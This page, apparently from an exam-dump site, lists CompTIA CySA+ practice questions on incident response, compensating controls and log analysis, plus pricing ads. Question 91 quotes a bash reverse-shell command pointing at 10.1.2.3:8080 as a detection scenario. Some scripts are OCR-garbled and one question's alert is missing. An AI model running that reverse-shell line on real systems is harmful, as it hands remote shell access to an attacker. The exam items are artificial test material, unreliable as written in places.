Summer Special Limited Time 65% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: bigdisc65

CompTIA CySA+ CS0-003 Updated Exam

Page: 22 / 24
Question 88

During an incident, some loCs of possible ransomware contamination were found in a group of servers in a segment of the network. Which of the following steps should be taken next?

Options:

A.

Isolation

B.

Remediation

C.

Reimaging

D.

Preservation

Question 89

A company has a primary control in place to restrict access to a sensitive database. However, the company discovered an authentication vulnerability that could bypass this control. Which of the following is the best compensating control?

Options:

A.

Running regular penetration tests to identify and address new vulnerabilities

B.

Conducting regular security awareness training of employees to prevent social engineering attacks

C.

Deploying an additional layer of access controls to verify authorized individuals

D.

Implementing intrusion detection software to alert security teams of unauthorized access attempts

Question 90

A security analyst is reviewing the following alert that was triggered by FIM on a critical system:

Which of the following best describes the suspicious activity that is occurring?

Options:

A.

A fake antivirus program was installed by the user.

B.

A network drive was added to allow exfiltration of data

C.

A new program has been set to execute on system start

D.

The host firewall on 192.168.1.10 was disabled.

Question 91

A security analyst identified the following suspicious entry on the host-based IDS logs:

bash -i >& /dev/tcp/10.1.2.3/8080 0>&1

Which of the following shell scripts should the analyst use to most accurately confirm if the activity is ongoing?

Options:

A.

#!/bin/bash

nc 10.1.2.3 8080 -vv >dev/null && echo "Malicious activity" Il echo "OK"

B.

#!/bin/bash

ps -fea | grep 8080 >dev/null && echo "Malicious activity" I| echo "OK"

C.

#!/bin/bash

ls /opt/tcp/10.1.2.3/8080 >dev/null && echo "Malicious activity" I| echo "OK"

D.

#!/bin/bash

netstat -antp Igrep 8080 >dev/null && echo "Malicious activity" I| echo "OK"

Page: 22 / 24
Exam Code: CS0-003
Exam Name: CompTIA CyberSecurity Analyst CySA+ Certification Exam
Last Update: Sep 12, 2024
Questions: 327
CS0-003 pdf

CS0-003 PDF

$28  $80
CS0-003 Engine

CS0-003 Testing Engine

$33.25  $95
CS0-003 PDF + Engine

CS0-003 PDF + Testing Engine

$45.5  $130